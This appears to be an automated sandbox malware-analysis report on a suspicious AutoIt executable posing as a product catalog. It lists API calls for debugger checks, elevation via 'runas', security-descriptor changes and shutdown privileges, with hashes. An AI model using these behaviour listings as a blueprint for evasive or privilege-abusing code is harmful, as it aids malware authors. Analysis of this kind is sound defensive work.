                                                                                                • Instruction ID: c3f5e6af55eb0da9fa74db60d4f5a84adac3a89a74612fbe59a223ef38337450
                                                                                                • Opcode Fuzzy Hash: bb2abcbadcb50e0008f3b1fe3e217bfa736f6ade076d8095da49bf04f95d98f8
                                                                                                • Instruction Fuzzy Hash: 0E51A171200201AFD710DF65DD85F5BB7A8AB84704F10892EFB44DB2C1D7B8E844CBAA
                                                                                                APIs
                                                                                                • GetCurrentDirectoryW.KERNEL32(00000104,?,00000001,?,00000000), ref: 0040D6E5
                                                                                                  • Part of subcall function 00401F80: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Products Order Catalogs20242.exe,00000104,?,?,?,?,00000000), ref: 00401FAD
                                                                                                  • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 00402078
                                                                                                  • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 0040208E
                                                                                                  • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 004020A4
                                                                                                  • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 004020BA
                                                                                                  • Part of subcall function 00401F80: _wcscpy.LIBCMT ref: 004020EF
                                                                                                • IsDebuggerPresent.KERNEL32(?), ref: 0040D6F1
                                                                                                • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\Products Order Catalogs20242.exe,00000104,?,004A7CF8,004A7CFC), ref: 0040D763
                                                                                                  • Part of subcall function 00401440: GetFullPathNameW.KERNEL32(?,00000104,?,00000000), ref: 00401483
                                                                                                • SetCurrentDirectoryW.KERNEL32(?,00000001,C:\Users\user\Desktop\Products Order Catalogs20242.exe,00000004), ref: 0040D7D6
                                                                                                • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,004846D6,00000010), ref: 00431AAB
                                                                                                • SetCurrentDirectoryW.KERNEL32(?,C:\Users\user\Desktop\Products Order Catalogs20242.exe,00000004), ref: 00431B0E
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104,C:\Users\user\Desktop\Products Order Catalogs20242.exe,00000004), ref: 00431B3F
                                                                                                • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 00431B8B
                                                                                                • ShellExecuteW.SHELL32(00000000), ref: 00431B92
                                                                                                  • Part of subcall function 004101F0: GetSysColorBrush.USER32(0000000F), ref: 004101F9
                                                                                                  • Part of subcall function 004101F0: LoadCursorW.USER32(00000000,00007F00), ref: 00410209
                                                                                                  • Part of subcall function 004101F0: LoadIconW.USER32(?,00000063), ref: 0041021F
                                                                                                  • Part of subcall function 004101F0: LoadIconW.USER32(?,000000A4), ref: 00410232
                                                                                                  • Part of subcall function 004101F0: LoadIconW.USER32(?,000000A2), ref: 00410245
                                                                                                  • Part of subcall function 004101F0: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041026A
                                                                                                  • Part of subcall function 004101F0: RegisterClassExW.USER32 ref: 004102C6
                                                                                                  • Part of subcall function 004103E0: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 00410415
                                                                                                  • Part of subcall function 004103E0: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 0041043E
                                                                                                  • Part of subcall function 004103E0: ShowWindow.USER32(?,00000000), ref: 00410454
                                                                                                  • Part of subcall function 004103E0: ShowWindow.USER32(?,00000000), ref: 0041045E
                                                                                                  • Part of subcall function 0040E1E0: _memset.LIBCMT ref: 0040E202
                                                                                                  • Part of subcall function 0040E1E0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E2C7
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memset_wcscpy
                                                                                                • String ID: @GH$@GH$C:\Users\user\Desktop\Products Order Catalogs20242.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                                                                • API String ID: 2493088469-2487124326
                                                                                                • Opcode ID: 69cfb0be49d24e5250ef6e64c59b5ea2b0a961f7c54b5140d3e7fdea8d41d4c7
                                                                                                • Instruction ID: f6e0ab4c143dd9a1f797559286fb6c41f0380d60009eb7dc722615656bf0e84e
                                                                                                • Opcode Fuzzy Hash: 69cfb0be49d24e5250ef6e64c59b5ea2b0a961f7c54b5140d3e7fdea8d41d4c7
                                                                                                • Instruction Fuzzy Hash: 0341F731618341ABD320F7A19C49BAF3BA4AB96704F04493FF941672D1DBBC9949C72E
                                                                                                APIs
                                                                                                  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403871
                                                                                                • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403887
                                                                                                • __wsplitpath.LIBCMT ref: 004038B2
                                                                                                  • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                                                • _wcscpy.LIBCMT ref: 004038C7
                                                                                                • _wcscat.LIBCMT ref: 004038DC
                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 004038EC
                                                                                                  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                  • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                                  • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                                  • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                                  • Part of subcall function 00403F40: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,0040397D,?,?,00000010), ref: 00403F54
                                                                                                  • Part of subcall function 00403F40: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,00000010), ref: 00403F8B
                                                                                                • _wcscpy.LIBCMT ref: 004039C2
                                                                                                • _wcslen.LIBCMT ref: 00403A53
                                                                                                • _wcslen.LIBCMT ref: 00403AAA
                                                                                                Strings
                                                                                                • Unterminated string, xrefs: 0042B9BA
                                                                                                • #include depth exceeded. Make sure there are no recursive includes, xrefs: 0042B87B
                                                                                                • Error opening the file, xrefs: 0042B8AC
                                                                                                • _, xrefs: 00403B48
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpy$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_wcscatstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                                • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                                                                                • API String ID: 4115725249-188983378
                                                                                                • Opcode ID: 9d3cc106af837a0ba3a302398e1680714f0cc5ac52ed53ec90940b3ab90f08f5
                                                                                                • Instruction ID: dca64db042171ec5605b2d10b6a92a42a2076cc25022adee7b8115af8a15fc96
                                                                                                • Opcode Fuzzy Hash: 9d3cc106af837a0ba3a302398e1680714f0cc5ac52ed53ec90940b3ab90f08f5
                                                                                                • Instruction Fuzzy Hash: 16D1D5B15083019AD710EF65C841AEB77E8AF95308F04492FF5C563292DB78DA49C7AB
                                                                                                APIs
                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 00434C12
                                                                                                • GetFileAttributesW.KERNEL32(?), ref: 00434C4F
                                                                                                • SetFileAttributesW.KERNEL32(?,?), ref: 00434C65
                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00434C77
                                                                                                • FindClose.KERNEL32(00000000), ref: 00434C88
                                                                                                • FindClose.KERNEL32(00000000), ref: 00434C9C
                                                                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 00434CB7
                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00434CFE
                                                                                                • SetCurrentDirectoryW.KERNEL32(0048A090), ref: 00434D22
                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00434D2A
                                                                                                • FindClose.KERNEL32(00000000), ref: 00434D35
                                                                                                • FindClose.KERNEL32(00000000), ref: 00434D43
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                • String ID: *.*
                                                                                                • API String ID: 1409584000-438819550
                                                                                                • Opcode ID: 55a9fa3bdb603958be151e0ad833d8004315071fb05557dfda8e1c4e562a15c1
                                                                                                • Instruction ID: 399dbb17912f16e5170155dcc5475d9346bc7ba5aa4a4c8a0ea4d4714b2c7a66
                                                                                                • Opcode Fuzzy Hash: 55a9fa3bdb603958be151e0ad833d8004315071fb05557dfda8e1c4e562a15c1
                                                                                                • Instruction Fuzzy Hash: 4141D8726042086BD710EF64DC45AEFB3A8AAC9311F14592FFD54C3280EB79E915C7B9
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Timetime$Sleep
                                                                                                • String ID: BUTTON
                                                                                                • API String ID: 4176159691-3405671355
                                                                                                • Opcode ID: c9fcf2e0d9fa6a0073e84c27d550d5c6e5d49d4b0adb2218bf3fff485548fdb5
                                                                                                • Instruction ID: 32c89cc89acb3c111fc3cc5f781edb0c57d51ec263d79eeef99f8852f1a29925
                                                                                                • Opcode Fuzzy Hash: c9fcf2e0d9fa6a0073e84c27d550d5c6e5d49d4b0adb2218bf3fff485548fdb5
                                                                                                • Instruction Fuzzy Hash: CB21B7723843016BE330DB74FD4DF5A7B94A7A5B51F244876F600E6290D7A5D442876C
                                                                                                APIs
                                                                                                • FindFirstFileW.KERNEL32(?,74DE8FB0,74DE8FB0,?,?,00000000), ref: 00442E40
                                                                                                • FindNextFileW.KERNEL32(00000000,?,?,00000000), ref: 00442EA4
                                                                                                • FindClose.KERNEL32(00000000,?,00000000), ref: 00442EB5
                                                                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 00442ED1
                                                                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 00442EF0
                                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00442F3B
                                                                                                • SetCurrentDirectoryW.KERNEL32(0048A090,?,?,?,00000000), ref: 00442F6D
                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00442F75
                                                                                                • FindClose.KERNEL32(00000000), ref: 00442F80
                                                                                                  • Part of subcall function 00436D2D: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000,74DF3220,00000000,00000000,00442E95,?,?,?), ref: 00436D4F
                                                                                                • FindClose.KERNEL32(00000000,?,?,?,00000000), ref: 00442F92
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                • String ID: *.*
                                                                                                • API String ID: 2640511053-438819550
                                                                                                • Opcode ID: 9379a40a392f11a7e453a238fddec55769e51d026bd73d4c4d0da232c8837110
                                                                                                • Instruction ID: 5fd3b3f399b1dfd6b0a62b5043663bf11a2259675d3c80dc16c90576bc2ddb84
                                                                                                • Opcode Fuzzy Hash: 9379a40a392f11a7e453a238fddec55769e51d026bd73d4c4d0da232c8837110
                                                                                                • Instruction Fuzzy Hash: 0F41E8326083046BD620FA64DD85BEFB3A89BC5311F54492FF95483280E7FEA50D8779
                                                                                                APIs
                                                                                                  • Part of subcall function 004392BC: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 004392DE
                                                                                                  • Part of subcall function 004392BC: GetLastError.KERNEL32 ref: 004392E4
                                                                                                  • Part of subcall function 004392BC: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0043930B
                                                                                                  • Part of subcall function 0043928B: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004392A5
                                                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,00000004,?,?,?,?), ref: 00445E4B
                                                                                                • _memset.LIBCMT ref: 00445E61
                                                                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00445E83
                                                                                                • GetLengthSid.ADVAPI32(?), ref: 00445E92
                                                                                                • GetAce.ADVAPI32(?,00000000,?,?,00000018), ref: 00445EDE
                                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00445EFB
                                                                                                • GetLengthSid.ADVAPI32(?,?,00000018), ref: 00445F11
                                                                                                • GetLengthSid.ADVAPI32(?,00000008,?,?,00000000,?,00000000), ref: 00445F39
                                                                                                • CopySid.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00445F40
                                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?,?,00000000,?,00000000), ref: 00445F6E
                                                                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000,?,00000000,?,00000000), ref: 00445F8B
                                                                                                • SetUserObjectSecurity.USER32(?,?,?), ref: 00445FA0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                • String ID:
                                                                                                • API String ID: 3490752873-0
                                                                                                • Opcode ID: b11fc48791dee11005ef1ac308328aec1e94b5ee495351b15ab77ecbbd68b2cc
                                                                                                • Instruction ID: 491154c1e478dcf6c9ac3cbca3c2c9e2645d4ee7bbdc2abf5fae4ada557f6fe4
                                                                                                • Opcode Fuzzy Hash: b11fc48791dee11005ef1ac308328aec1e94b5ee495351b15ab77ecbbd68b2cc
                                                                                                • Instruction Fuzzy Hash: 85519D71108301ABD610DF61CD84E6FB7E9AFC9B04F04491EFA869B242D778E909C76B
                                                                                                APIs
                                                                                                • OleInitialize.OLE32(00000000), ref: 0047AA03
                                                                                                • CLSIDFromProgID.OLE32(00000000,?), ref: 0047AA27
                                                                                                • CoCreateInstance.OLE32(?,00000000,00000005,004829C0,?), ref: 0047AAAA
                                                                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0047AB6B
                                                                                                • _memset.LIBCMT ref: 0047AB7C
                                                                                                • _wcslen.LIBCMT ref: 0047AC68
                                                                                                • _memset.LIBCMT ref: 0047ACCD
                                                                                                • CoCreateInstanceEx.OLE32 ref: 0047AD06
                                                                                                • CoSetProxyBlanket.OLE32(004829D0,?,?,?,?,?,?,00000800), ref: 0047AD53
                                                                                                Strings
                                                                                                • NULL Pointer assignment, xrefs: 0047AD84
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateInitializeInstance_memset$BlanketFromProgProxySecurity_wcslen
                                                                                                • String ID: NULL Pointer assignment
                                                                                                • API String ID: 1588287285-2785691316
                                                                                                • Opcode ID: 40e9c8eb680feb4042e694522f3113d29542bf103086fe34e1494599e09369de
                                                                                                • Instruction ID: 16786b45dbc5194aa398acfc0f0ff3b91b98a178c64a073a91da7f4e0cb75f58
                                                                                                • Opcode Fuzzy Hash: 40e9c8eb680feb4042e694522f3113d29542bf103086fe34e1494599e09369de
                                                                                                • Instruction Fuzzy Hash: 54B10DB15083409FD320EF65C881B9FB7E8BBC8744F108E2EF58997291D7759948CB66
                                                                                                APIs
                                                                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 004364B9
                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 004364C0
                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004364D6
                                                                                                • AdjustTokenPrivileges.ADVAPI32 ref: 004364FE
                                                                                                • GetLastError.KERNEL32 ref: 00436504
                                                                                                • ExitWindowsEx.USER32(?,00000000), ref: 00436527
                                                                                                • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 00436557
                                                                                                • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 0043656A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                                                                                • String ID: SeShutdownPrivilege
                                                                                                • API String ID: 2938487562-3733053543
                                                                                                • Opcode ID: 9f228ad1da6a4c81f8cb5394189ecc1147849337ed66d96e43b1ced3868a671c
                                                                                                • Instruction ID: b625d7910520021a286729d09db348b3c4b0b131b75d5259d4bd29649b467962
                                                                                                • Opcode Fuzzy Hash: 9f228ad1da6a4c81f8cb5394189ecc1147849337ed66d96e43b1ced3868a671c
                                                                                                • Instruction Fuzzy Hash: E021D5B02803017FF7149B64DD4AF6B3398EB48B10F948829FE09852D2D6BDE844973D
                                                                                                APIs
                                                                                                • __swprintf.LIBCMT ref: 00436162
                                                                                                • __swprintf.LIBCMT ref: 00436176
                                                                                                  • Part of subcall function 0041353A: __woutput_l.LIBCMT ref: 0041358F
                                                                                                • __wcsicoll.LIBCMT ref: 00436185
                                                                                                • FindResourceW.KERNEL32(?,?,0000000E), ref: 004361A6
                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 004361AE
                                                                                                • LockResource.KERNEL32(00000000), ref: 004361B5
                                                                                                • FindResourceW.KERNEL32(?,?,00000003), ref: 004361DA
                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 004361E4
                                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 004361F0
                                                                                                • LockResource.KERNEL32(?), ref: 004361FD
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll__woutput_l
                                                                                                • String ID:
                                                                                                • API String ID: 2406429042-0
                                                                                                • Opcode ID: c1b2c305ea449a9eaa2c50be24a6d356ee30b865a6e7eb3c9e4c44cc17d92184
                                                                                                • Instruction ID: 79d88324f8a28cdfdddc37bd7103cac5134eefaeeaedb246b69d205017f9fa0d
                                                                                                • Opcode Fuzzy Hash: c1b2c305ea449a9eaa2c50be24a6d356ee30b865a6e7eb3c9e4c44cc17d92184
                                                                                                • Instruction Fuzzy Hash: 82313432104210BFD700EF64ED88EAF77A9FB89304F00882BFA4196150E778D940CB68
                                                                                                APIs
                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D522
                                                                                                • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D593
                                                                                                • GetLastError.KERNEL32 ref: 0045D59D
                                                                                                • SetErrorMode.KERNEL32(?), ref: 0045D629
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
                                                                                                • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                • API String ID: 4194297153-14809454
                                                                                                • Opcode ID: 49e0e17e9479d30b414134c7f78092e00673ae1a45d158f41d80208550ba4cb8
                                                                                                • Instruction ID: 49a1caac5541b587bc648ef7caa6256b54369420b38b3993b587487a6931f65b
                                                                                                • Opcode Fuzzy Hash: 49e0e17e9479d30b414134c7f78092e00673ae1a45d158f41d80208550ba4cb8
                                                                                                • Instruction Fuzzy Hash: BA31AD75A083009FC310EF55D98090BB7E1AF89315F448D6FF94997362D778E9068B6A
                                                                                                APIs
                                                                                                • MkParseDisplayName.OLE32(?,00000000,?,?), ref: 0047AF0F
                                                                                                  • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                                                  • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                                                  • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                                                  • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                                                • OleInitialize.OLE32(00000000), ref: 0047AE06
                                                                                                  • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                                  • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                                • _wcslen.LIBCMT ref: 0047AE18
                                                                                                • CreateBindCtx.OLE32(00000000,?), ref: 0047AEC2
                                                                                                • CLSIDFromProgID.OLE32(00000000,?,?), ref: 0047AFCC
                                                                                                • GetActiveObject.OLEAUT32(?,00000000,?), ref: 0047AFF9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1761753476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1761722582.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761810023.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761824941.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1761851525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Products Order Catalogs20242.jbxd
                                                                                                Similarity
